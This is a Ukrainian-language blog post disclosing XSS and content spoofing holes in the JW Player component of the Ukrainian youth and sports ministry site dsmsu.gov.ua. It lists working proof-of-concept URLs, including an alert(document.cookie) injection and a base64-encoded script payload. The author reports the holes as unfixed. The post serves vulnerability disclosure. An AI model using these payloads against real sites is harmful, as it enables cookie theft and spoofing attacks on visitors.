Уразливості на dsmsu.gov.ua
17:23 14.02.201430.10.2013
У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості на сайті Держмолодьспорту - http://dsmsu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно державних сайтів в останнє я писав про уразливості на nrcu.gov.ua та www.bank.gov.ua.
Детальна інформація про уразливості з’явиться пізніше.
14.02.2014
Уразливості в JW Player я описав в попередні роки.
XSS:
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg
Та інші XSS уразливості в JW Player.
Content Spoofing:
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
Та інші CS уразливості в JW Player.
На сайті є й інші дірки, про які я повідомив адмінам та розробникам движка, що розробляли сайт. Дані уразливості досі не виправлені.